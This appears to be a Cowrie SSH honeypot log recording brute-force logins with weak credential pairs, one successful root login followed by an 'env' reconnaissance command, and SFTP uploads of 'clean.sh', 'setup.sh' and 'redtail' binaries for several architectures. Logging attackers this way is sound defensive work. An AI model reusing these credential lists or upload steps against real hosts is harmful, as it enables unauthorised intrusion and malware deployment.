{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","size":80,"shasum":"96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:11:55.676097Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T01:11:55.737008Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T01:11:55.739208Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T01:11:55.742779Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T01:11:55.745450Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T01:11:55.747957Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T01:11:55.749385Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.session.closed","duration":"14.4","message":"Connection lost after 14.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:11:55.815934Z","src_ip":"212.227.125.160","session":"b2c10f9d65be"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":55984,"dst_ip":"1.2.3.4","dst_port":22,"session":"387158b97a36","protocol":"ssh","message":"New connection: 194.233.79.134:55984 (1.2.3.4:22) [session: 387158b97a36]","sensor":"my-vps","timestamp":"2025-08-28T01:12:15.093081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:12:16.322925Z","src_ip":"194.233.79.134","session":"387158b97a36"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:12:16.324412Z","src_ip":"194.233.79.134","session":"387158b97a36"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-28T01:12:18.288202Z","src_ip":"194.233.79.134","session":"387158b97a36"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:12:20.959626Z","src_ip":"194.233.79.134","session":"387158b97a36"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58652,"dst_ip":"1.2.3.4","dst_port":22,"session":"17172652111e","protocol":"ssh","message":"New connection: 217.72.205.35:58652 (1.2.3.4:22) [session: 17172652111e]","sensor":"my-vps","timestamp":"2025-08-28T01:13:06.364193Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:13:06.365407Z","src_ip":"217.72.205.35","session":"17172652111e"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":44077,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dd6b4cfd61b","protocol":"ssh","message":"New connection: 80.94.95.15:44077 (1.2.3.4:22) [session: 0dd6b4cfd61b]","sensor":"my-vps","timestamp":"2025-08-28T01:13:39.493088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:13:39.494014Z","src_ip":"80.94.95.15","session":"0dd6b4cfd61b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:13:39.545510Z","src_ip":"80.94.95.15","session":"0dd6b4cfd61b"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"7777777","message":"login attempt [magdalena/7777777] failed","sensor":"my-vps","timestamp":"2025-08-28T01:13:39.832795Z","src_ip":"80.94.95.15","session":"0dd6b4cfd61b"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"abc123","message":"login attempt [magdalena/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:13:40.886029Z","src_ip":"80.94.95.15","session":"0dd6b4cfd61b"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":38884,"dst_ip":"1.2.3.4","dst_port":22,"session":"6703a87061e9","protocol":"ssh","message":"New connection: 194.233.79.134:38884 (1.2.3.4:22) [session: 6703a87061e9]","sensor":"my-vps","timestamp":"2025-08-28T01:13:41.709063Z"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"abcd123","message":"login attempt [magdalena/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:13:41.966207Z","src_ip":"80.94.95.15","session":"0dd6b4cfd61b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:13:42.227583Z","src_ip":"194.233.79.134","session":"6703a87061e9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:13:42.229676Z","src_ip":"194.233.79.134","session":"6703a87061e9"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"abcd1234","message":"login attempt [magdalena/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:13:43.019154Z","src_ip":"80.94.95.15","session":"0dd6b4cfd61b"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:13:44.052510Z","src_ip":"194.233.79.134","session":"6703a87061e9"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"abc1234","message":"login attempt [magdalena/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:13:44.071563Z","src_ip":"80.94.95.15","session":"0dd6b4cfd61b"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:13:45.141424Z","src_ip":"80.94.95.15","session":"0dd6b4cfd61b"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:13:45.386959Z","src_ip":"194.233.79.134","session":"6703a87061e9"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":28091,"dst_ip":"1.2.3.4","dst_port":22,"session":"34765ccfd1e0","protocol":"ssh","message":"New connection: 80.94.95.15:28091 (1.2.3.4:22) [session: 34765ccfd1e0]","sensor":"my-vps","timestamp":"2025-08-28T01:13:57.336366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:13:57.337600Z","src_ip":"80.94.95.15","session":"34765ccfd1e0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:13:57.412617Z","src_ip":"80.94.95.15","session":"34765ccfd1e0"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie","message":"login attempt [macie/macie] failed","sensor":"my-vps","timestamp":"2025-08-28T01:13:57.816826Z","src_ip":"80.94.95.15","session":"34765ccfd1e0"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie1","message":"login attempt [macie/macie1] failed","sensor":"my-vps","timestamp":"2025-08-28T01:13:58.921342Z","src_ip":"80.94.95.15","session":"34765ccfd1e0"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie123","message":"login attempt [macie/macie123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:14:00.016340Z","src_ip":"80.94.95.15","session":"34765ccfd1e0"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie1234","message":"login attempt [macie/macie1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:14:01.111133Z","src_ip":"80.94.95.15","session":"34765ccfd1e0"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie12345","message":"login attempt [macie/macie12345] failed","sensor":"my-vps","timestamp":"2025-08-28T01:14:02.207352Z","src_ip":"80.94.95.15","session":"34765ccfd1e0"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:14:03.301914Z","src_ip":"80.94.95.15","session":"34765ccfd1e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33290,"dst_ip":"1.2.3.4","dst_port":22,"session":"25a7b58f661c","protocol":"ssh","message":"New connection: 212.227.235.229:33290 (1.2.3.4:22) [session: 25a7b58f661c]","sensor":"my-vps","timestamp":"2025-08-28T01:14:20.811890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:14:20.812806Z","src_ip":"212.227.235.229","session":"25a7b58f661c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:14:20.920334Z","src_ip":"212.227.235.229","session":"25a7b58f661c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123456","message":"login attempt [admin/admin123456] failed","sensor":"my-vps","timestamp":"2025-08-28T01:14:21.245728Z","src_ip":"212.227.235.229","session":"25a7b58f661c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:14:22.355797Z","src_ip":"212.227.235.229","session":"25a7b58f661c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:14:51.767275Z","src_ip":"212.227.235.229","session":"c42182a80d78"}
{"eventid":"cowrie.session.closed","duration":180.25204706192017,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:14:51.771910Z","src_ip":"212.227.235.229","session":"c42182a80d78"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":33566,"dst_ip":"1.2.3.4","dst_port":22,"session":"6adcc18b3564","protocol":"ssh","message":"New connection: 194.233.79.134:33566 (1.2.3.4:22) [session: 6adcc18b3564]","sensor":"my-vps","timestamp":"2025-08-28T01:15:31.704355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:15:31.890315Z","src_ip":"194.233.79.134","session":"6adcc18b3564"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:15:32.242933Z","src_ip":"194.233.79.134","session":"6adcc18b3564"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-28T01:15:34.041644Z","src_ip":"194.233.79.134","session":"6adcc18b3564"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:15:35.751458Z","src_ip":"194.233.79.134","session":"6adcc18b3564"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":35881,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9e5c47c15f5","protocol":"ssh","message":"New connection: 186.225.142.90:35881 (1.2.3.4:22) [session: b9e5c47c15f5]","sensor":"my-vps","timestamp":"2025-08-28T01:15:58.972253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:15:59.367788Z","src_ip":"186.225.142.90","session":"b9e5c47c15f5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:15:59.368609Z","src_ip":"186.225.142.90","session":"b9e5c47c15f5"}
{"eventid":"cowrie.login.success","username":"root","password":"06GkR09","message":"login attempt [root/06GkR09] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:16:02.475708Z","src_ip":"186.225.142.90","session":"b9e5c47c15f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:16:03.694123Z","src_ip":"186.225.142.90","session":"b9e5c47c15f5"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T01:16:03.694849Z","src_ip":"186.225.142.90","session":"b9e5c47c15f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:16:04.368481Z","src_ip":"186.225.142.90","session":"b9e5c47c15f5"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:16:04.667186Z","src_ip":"186.225.142.90","session":"b9e5c47c15f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36811,"dst_ip":"1.2.3.4","dst_port":22,"session":"5daad6524ef0","protocol":"ssh","message":"New connection: 212.227.235.229:36811 (1.2.3.4:22) [session: 5daad6524ef0]","sensor":"my-vps","timestamp":"2025-08-28T01:16:05.447892Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:16:05.449066Z","src_ip":"212.227.235.229","session":"5daad6524ef0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37123,"dst_ip":"1.2.3.4","dst_port":22,"session":"77e28bdbad70","protocol":"ssh","message":"New connection: 212.227.235.229:37123 (1.2.3.4:22) [session: 77e28bdbad70]","sensor":"my-vps","timestamp":"2025-08-28T01:16:05.583448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:16:05.584728Z","src_ip":"212.227.235.229","session":"77e28bdbad70"}
